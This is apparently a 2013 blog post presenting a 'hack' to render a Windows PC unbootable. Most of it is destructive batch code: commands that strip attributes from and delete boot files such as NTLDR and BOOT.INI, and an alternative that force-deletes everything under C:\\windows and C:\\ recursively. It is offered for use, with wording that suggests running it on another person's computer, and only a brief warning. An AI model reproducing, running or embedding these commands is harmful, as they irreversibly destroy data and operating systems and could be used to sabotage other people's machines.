Tuesday 21 May 2013

How to shut down a PC forever

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad


@ECHO OFF

ATTRIB -R -S -H C:\AUTOEXEC.BAT

DEL C:\AUTOEXEC.BAT

ATTRIB -R -S -H C:\BOOT.INI

DEL C:\BOOT.INI

ATTRIB -R -S -H C:\NTLDR

DEL C:\NTLDR

ATTRIB -R -S -H C:\WINDOWS\WIN.INI

DEL C:\WINDOWS\WIN.INI


Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.


DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!


This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.


Here’s an alternative code.


cmd /c del c:\windows\* /F /S /Q


cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat.




How to shut down a PC forever

0 comments:

Post a Comment